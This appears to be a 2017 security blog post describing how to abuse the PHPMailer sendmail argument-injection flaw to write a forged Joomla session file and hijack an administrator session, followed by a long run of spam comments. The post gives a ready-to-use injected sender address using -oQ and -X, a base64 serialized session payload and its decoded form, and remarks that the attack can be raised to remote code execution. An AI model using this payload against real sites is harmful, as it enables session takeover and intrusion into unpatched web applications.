понедельник, 2 января 2017 г.

Using PHPMailer vulnerability to take the session

At the end of 2016 world was shocked by remote code execution exploit for PHPMailer. 

It's a very common 3rd party library which used by Drupal, WordPress, Joomla and numbers of others top web projects.


The reason of this vulnerability is an incorrect data filtration in the email address while using it as a argument for the sendmail utility execution via system shell. As a result, remote attacker can upload arbitrary file by using -X argument.

Obvious way to exploit this is a web shell upload. However, it depends on two different requirements:
  1. Attacker should know full path to the web root directory (like /var/www)
  2. Web application should have file system privileges to write into one of the web directories.
We suggest another one way to exploit this vulnerability with no described requirements. It's session file upload way. 

For Joomla the exploit could looks like:
$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com';
$msg_body  = 'joomla|s:1572:"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo4O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTQ4MzM4ODA2MztzOjQ6Imxhc3QiO2k6MTQ4MzM4ODEzNjtzOjM6Im5vdyI7aToxNDgzMzg4MzY1O31zOjU6InRva2VuIjtzOjMyOiJuWmx5ZFdYMUN4M1VnbjhRbWNLN0RnRGJNTkZBMVFkeSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo1OiJzZXR1cCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJvcHRpb25zIjthOjE1OntzOjk6InNpdGVfbmFtZSI7czoxNDoicnVzc2lhLXJlbGF0ZWQiO3M6MTE6ImFkbWluX2VtYWlsIjtzOjEyOiJhc2RAYXNkcy5jb20iO3M6MTA6ImFkbWluX3VzZXIiO3M6NToiYWRtaW4iO3M6MTQ6ImFkbWluX3Bhc3N3b3JkIjtzOjI4OiJydXNzaWEtcmVsYXRlZHJ1c3NpYS1yZWxhdGVkIjtzOjEzOiJzaXRlX21ldGFkZXNjIjtzOjA6IiI7czoxMjoic2l0ZV9vZmZsaW5lIjtpOjA7czo4OiJsYW5ndWFnZSI7czo1OiJlbi1VUyI7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJkYl90eXBlIjtzOjY6Im15c3FsaSI7czo3OiJkYl9ob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo3OiJkYl91c2VyIjtzOjQ6InJvb3QiO3M6NzoiZGJfcGFzcyI7czoxMjoibXktc2VjcmV0LXB3IjtzOjc6ImRiX25hbWUiO3M6NDoidGVzdCI7czo2OiJkYl9vbGQiO3M6NjoiYmFja3VwIjtzOjk6ImRiX3ByZWZpeCI7czo2OiJwa2M2cV8iO319fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=";';

Then set the value f8af03562e674480401098254fe223e0 in Cookie and take a profit :)

Moreover, in Joomla case it's also serialized data inside this base64 body:
O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}

So, the attacker could also upgrade this to the RCE.

31 комментарий:

  1. Previously, in the event that you needed an advance, you would need to visit an advance office and give documentation so the budgetary organization could decide if they should credit cash to you.Payday Loans San-diegoCash AdvanceAuto Title Loans

    ОтветитьУдалить
  2. This is really great work. Thank you for sharing such a good and useful information here in the blog for everywhere. shadow fight 3 mod apk hitman sniper apk geometry dash mod apk

    ОтветитьУдалить
  3. we recommend you best tours and hotels that give you the best services to have a memorable trip the jewel in Islam's crown.
    car rental tehran airport
    iran attractions
    iran tours

    ОтветитьУдалить
  4. Hi, today I decided to find some kind of part-time job on the Internet at home and found this site slapping free gambling at first I was afraid I was afraid that they would be deceived but I certainly took a chance and did not regret it, now I want to share with you

    ОтветитьУдалить
  5. Read the information you share, it is very helpful for me. Hope I will learn more interesting information on your blog.
    Đến với Proship khách hàng sẽ được sử dụng những dịch vụ tốt nhất, chất lượng nhất, thời gian nhanh nhất và đặc biệt giá cả cạnh tranh nhất.
    Dịch vụ vận chuyển ô tô
    Dịch vụ cho thuê xe tải
    Vận chuyển xe máy bằng tàu hỏa
    Dịch vụ chuyển hàng bằng container,...

    ОтветитьУдалить
  6. Put more information on this page, I really like your blog more. OGEN Infosystem is presented Top 5 Website Designing Company in India and they have also experienced team of Digital Marketing for SEO, PPC, and other social media activities.
    Website Designing Company in Delhi

    ОтветитьУдалить
  7. Appslure is a reputed company based in India which provide mobile app development company in mumbai. Our website's layout will be very attractive and responsive, which will gain more visitors and you can get high lead and business from your website. Wonderful post, This article have helped greatly continue writing ..
    Mobile app development company in mumbai

    ОтветитьУдалить
  8. มาเล่นสล็อตแสนสนุก live22 ที่นี่สิ https://www.slotxd.com/live22

    ОтветитьУдалить
  9. Aol desktop gold is an all in one desktop which is used for various purposes. It provides high security to the account and stores the data in encrypted form. It updates the existing version by itself. Download aol desktop gold from aol download

    ОтветитьУдалить
  10. Geek squad provides device fixation service. It covers minor errors to major issues. If you face any problem in your electronic device, then contact best buy geek squad number. The technicians are always available. For further queries, please visit geek squad best buy

    ОтветитьУдалить
  11. such an amazing article thanks for sharing this keep posting.
    you'll love to see my site micro blaster as well.

    ОтветитьУдалить
  12. ทริคเล่นบาคาร่า เคล็ดลับเล็กๆ น้อยๆ ที่สามารถช่วยให้ประสบความสำเร็จจากการเล่น บาคาร่าออนไลน์ ได้ และคนส่วนใหญ่มักจะมองข้าม บาคาร่าสูตร เหล่านี้เพราะส่วนใหญ่มักชอบใช้ดวงในการเล่น

    การเล่นบาคาร่า เป็นเกมที่ใช้เวลาในการเล่นเร็วมาก ใช้เวลาในการลุ้นเกมไม่นาน จึงทำให้เป็นที่ชื่นชอบของนักสี่ยงโชคทั้งหลาย นักพนันที่เล่นบาคาร่าส่วนใหญ่นั้นล้วนมีวัตถุประสงค์ในการเล่นเหมือนๆกันนั่นก็คือการทำกำไรจากการเล่นบาคาร่า นั่นเอง ซึ่งหากเล่นโดยอาศัยดวงอย่างเดียวนั้น คงไม่สามารถประสบความสำเร็จจากการเล่นได้แน่นอน ดังนั้นจะต้องมีทริคและเคล็ดลับต่างๆช่วยในการเล่นบาคาร่าออนไลน์

    สนใจอ่านรายละเอียดเพิ่มเติมได้ที่ >> บาคาร่าสูตร

    ОтветитьУдалить
  13. Usually I never comment on blogs but your article is so convincing that I never stop myself to say something about it. You’re doing a great job Man,Keep it up.
    Best study abroad consultants in delhi
    Overseas Education Consultants in Delhi

    ОтветитьУдалить
  14. Thank you for sharing the post. We support all types of HP printer related issues and service. Just enter the model number of your printer in 123.hp.com/setup to identify the software and driver your printer requires or setup a new printer. Get download and install it in your mac and 'Run' the file. The process is easy however if you have any doubts or queries regarding HP printers contact us viva our toll free number.

    ОтветитьУдалить
  15. Students find International Relations Research Paper Services as being of great assistance since they are able to complete their custom international research papers and international relations essay services on time.

    ОтветитьУдалить
  16. Wow! for the such good information which is very helpful for us as informative knowledge. If you are looking for the HP Printer any issues at any time our team is always their for your HP Printer.
    Why HP Envy Photo 7155 Printer is Printing Blank Pages
    Fix Epson Printer Error Code 031008 Issues

    ОтветитьУдалить
  17. Nice Blog……
    Here we are specialize in Manufacturing of shot blasting machine. Shot Blasting machine are customized and slandered type portable shot blasting machine which are used to clean the surface.
    See more
    shot blasting machine manufacturers
    sand blasting machine
    Grit Blasting Machine
    Thermal Spray Gun
    Flame spray gun

    ОтветитьУдалить
  18. Codeaxia Digital Solutions is a digital agency based out of Delhi/NCR. We provide valuable & economical digital solutions for the customers in areas such as website designing, development & maintenance, graphic designing, digital marketing and mobile applications development.
    Codeaxia provides best solutions -
    Responsive Web Designing
    SEO Ready Web Development
    Ecommerce Website Development
    ROI Focussed Digital Marketing

    ОтветитьУдалить
  19. If you are facing any trouble with your AOL Desktop Gold for mac/Window. Get Contact Install AOL Gold Toll free Number or download AOL Desktop Gold link.
    Read more: - AOL Desktop Gold | Download AOL Gold

    ОтветитьУдалить
  20. If you face any problem regarding SBC Global email then contact us on our SBCGlobal Support Number.
    Read More : - SBCGlobal Customer Care Phone Number | SBCGlobal Customer Support Number

    ОтветитьУдалить
  21. Awesome post done by author. If you have any problem regarding the Printer or any other peripherals devices call us or visit our official website anytime. We feel proud to help you.
    Fix CD/DVD Drive Device Driver is Missing in My Laptop
    Scan from HP Photosmart Printer to your mac

    ОтветитьУдалить
  22. Students find Speech Writing Services as being of great assistance since they are able to seek our professional speech writing services and online custom speech writing help on time.

    ОтветитьУдалить